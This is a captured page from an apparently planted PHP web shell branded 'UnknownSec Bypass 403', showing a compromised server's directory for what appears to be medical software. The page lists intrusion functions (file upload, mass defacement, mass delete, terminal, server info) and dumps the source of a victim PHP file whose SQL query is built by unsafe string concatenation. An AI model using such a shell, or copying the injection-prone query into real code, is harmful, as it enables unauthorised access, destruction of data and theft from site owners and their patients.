UnknownSec Bypass
403
:
/
var
/
www
/
zenithentcare
/
stmedicosoftware
/ [
drwxrwxr-x
]
Menu
Upload
Mass depes
Mass delete
Terminal
Info server
About
name :
get_total_category.php
<?php require_once "config.php"; $query =mysqli_query($conn,"SELECT * FROM testdetailsmaster where identifier='".$gcategoryidentifier."' and isdeleted='".$gnotdeleted."'"); while($row=mysqli_fetch_array($query)) { $result[] = array( 'tid' => $row['testdetailsid'], 'tname' => $row['testname'], ); } echo json_encode($result); ?>
Copyright © 2025 - UnknownSec